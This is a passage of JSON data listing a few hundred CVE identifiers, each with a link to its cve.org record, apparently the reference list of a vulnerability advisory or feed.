"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-52433",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52433"
},
{
"name": "CVE-2022-50700",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50700"
},
{
"name": "CVE-2022-50821",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50821"
},
{
"name": "CVE-2024-41007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41007"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2023-54110",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54110"
},
{
"name": "CVE-2022-50816",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50816"
},
{
"name": "CVE-2022-50881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50881"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2023-54205",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54205"
},
{
"name": "CVE-2023-53866",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53866"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2025-71142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71142"
},
{
"name": "CVE-2024-56721",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56721"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2022-50724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50724"
},
{
"name": "CVE-2022-50633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50633"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2022-50859",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50859"
},
{
"name": "CVE-2022-50750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50750"
},
{
"name": "CVE-2022-50726",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50726"
},
{
"name": "CVE-2022-50814",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50814"
},
{
"name": "CVE-2023-54040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54040"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2023-54214",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54214"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-53148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53148"
},
{
"name": "CVE-2023-54090",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54090"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-53755",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53755"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54079",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54079"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54202",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54202"
},
{
"name": "CVE-2023-54007",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54007"
},
{
"name": "CVE-2023-54024",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54024"
},
{
"name": "CVE-2024-50040",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50040"
},
{
"name": "CVE-2022-50781",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50781"
},
{
"name": "CVE-2022-50860",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50860"
},
{
"name": "CVE-2022-50780",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50780"
},
{
"name": "CVE-2022-50649",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50649"
},
{
"name": "CVE-2025-21764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21764"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2022-50829",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50829"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2022-50830",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50830"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2023-54274",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54274"
},
{
"name": "CVE-2022-50666",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50666"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54108",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54108"
},
{
"name": "CVE-2022-50745",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50745"
},
{
"name": "CVE-2025-21766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21766"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2023-54317",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54317"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2022-50736",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50736"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2022-50740",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50740"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2022-50329",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50329"
},
{
"name": "CVE-2023-54298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54298"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2022-50822",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50822"
},
{
"name": "CVE-2025-40136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40136"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
"name": "CVE-2023-54053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54053"
},
{
"name": "CVE-2022-50843",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50843"
},
{
"name": "CVE-2022-50769",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50769"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2023-54295",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54295"
},
{
"name": "CVE-2022-50752",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50752"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68215"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-53418",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53418"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2022-50716",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50716"
},
{
"name": "CVE-2022-50698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50698"
},
{
"name": "CVE-2022-50844",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50844"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2022-50773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50773"
},
{
"name": "CVE-2022-50758",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50758"
},
{
"name": "CVE-2022-50848",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50848"
},
{
"name": "CVE-2024-36348",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36348"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2022-50662",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50662"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2023-54243",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54243"
},
{
"name": "CVE-2023-54078",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54078"
},
{
"name": "CVE-2022-50819",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50819"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2023-54102",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54102"
},
{
"name": "CVE-2023-52983",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52983"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2024-26935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26935"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-53802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53802"
},
{
"name": "CVE-2022-50887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50887"
},
{
"name": "CVE-2022-50757",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50757"
},
{
"name": "CVE-2022-0854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0854"
},
{
"name": "CVE-2022-50827",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50827"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
{
"name": "CVE-2025-38602",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38602"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-53820",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53820"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2025-38007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38007"
},
{
"name": "CVE-2025-40088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40088"
},
{
"name": "CVE-2022-50679",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50679"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-21760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21760"
},
{
"name": "CVE-2024-26832",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26832"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2022-50839",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50839"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2023-54301",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54301"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2022-50744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50744"
},
{
"name": "CVE-2023-54277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54277"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2023-54046",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54046"
},
{
"name": "CVE-2022-50717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50717"
},
{
"name": "CVE-2023-54120",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54120"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2022-50742",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50742"
},
{
"name": "CVE-2025-38656",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38656"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2023-53783",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53783"
},
{
"name": "CVE-2024-56690",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56690"
},
{
"name": "CVE-2023-54028",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54028"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2022-50722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50722"
},
{
"name": "CVE-2022-50709",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50709"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2022-50728",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50728"
},
{
"name": "CVE-2022-50677",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50677"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2023-54003",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54003"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2023-53744",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53744"
},
{
"name": "CVE-2023-53178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53178"
},
{
"name": "CVE-2023-23559",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23559"
},
{
"name": "CVE-2022-50718",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50718"
},
{
"name": "CVE-2022-50658",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50658"
},
{
"name": "CVE-2023-54009",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54009"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2022-50660",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50660"
},
{
"name": "CVE-2024-50143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50143"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2022-50886",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50886"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2023-54097",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54097"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2022-50626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50626"
},
{
"name": "CVE-2022-50767",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50767"
},
{
"name": "CVE-2023-53853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53853"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2022-50880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50880"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2022-48838",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48838"
},
{
"name": "CVE-2022-50885",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50885"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2022-49980",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49980"
},
{
"name": "CVE-2023-53840",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53840"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2023-53464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53464"
},
{
"name": "CVE-2022-50661",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50661"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2023-54284",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54284"
},
{
"name": "CVE-2022-50824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50824"
},
{
"name": "CVE-2025-71141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71141"
},
{
"name": "CVE-2025-40177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40177"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2022-50623",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50623"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-53788",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53788"
},
{
"name": "CVE-2022-50580",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50580"
},
{
"name": "CVE-2023-53215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53215"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2022-50864",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50864"
},
{
"name": "CVE-2023-53832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53832"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2022-50715",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50715"
},
{
"name": "CVE-2022-50735",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50735"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2023-54015",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54015"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2023-54122",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54122"
},
{
"name": "CVE-2023-54119",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54119"
},
{
"name": "CVE-2022-50675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50675"
},
{
"name": "CVE-2023-54159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54159"
},
{
"name": "CVE-2022-50751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50751"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54245",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54245"
},
{
"name": "CVE-2022-50347",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50347"
},
{
"name": "CVE-2023-54168",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54168"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2022-50889",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50889"
},
{
"name": "CVE-2023-54146",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54146"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2023-54118",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54118"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2022-50699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50699"
},
{
"name": "CVE-2022-49943",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49943"
},
{
"name": "CVE-2023-53990",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53990"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2022-50870",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50870"
},
{
"name": "CVE-2023-54058",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54058"
},
{
"name": "CVE-2023-52874",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52874"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2023-53417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53417"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2025-40044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40044"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2023-54311",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54311"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-54126",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54126"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
"name": "CVE-2022-50697",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50697"
},
{
"name": "CVE-2022-50733",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50733"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54084",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54084"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2022-50731",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50731"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2022-50851",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50851"
},
{
"name": "CVE-2025-21681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21681"
},
{
"name": "CVE-2022-50615",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50615"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2024-58020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58020"
},
{
"name": "CVE-2022-50704",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50704"
},
{
"name": "CVE-2023-53747",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53747"
},
{
"name": "CVE-2022-50730",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50730"
},
{
"name": "CVE-2022-50617",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50617"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53751"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
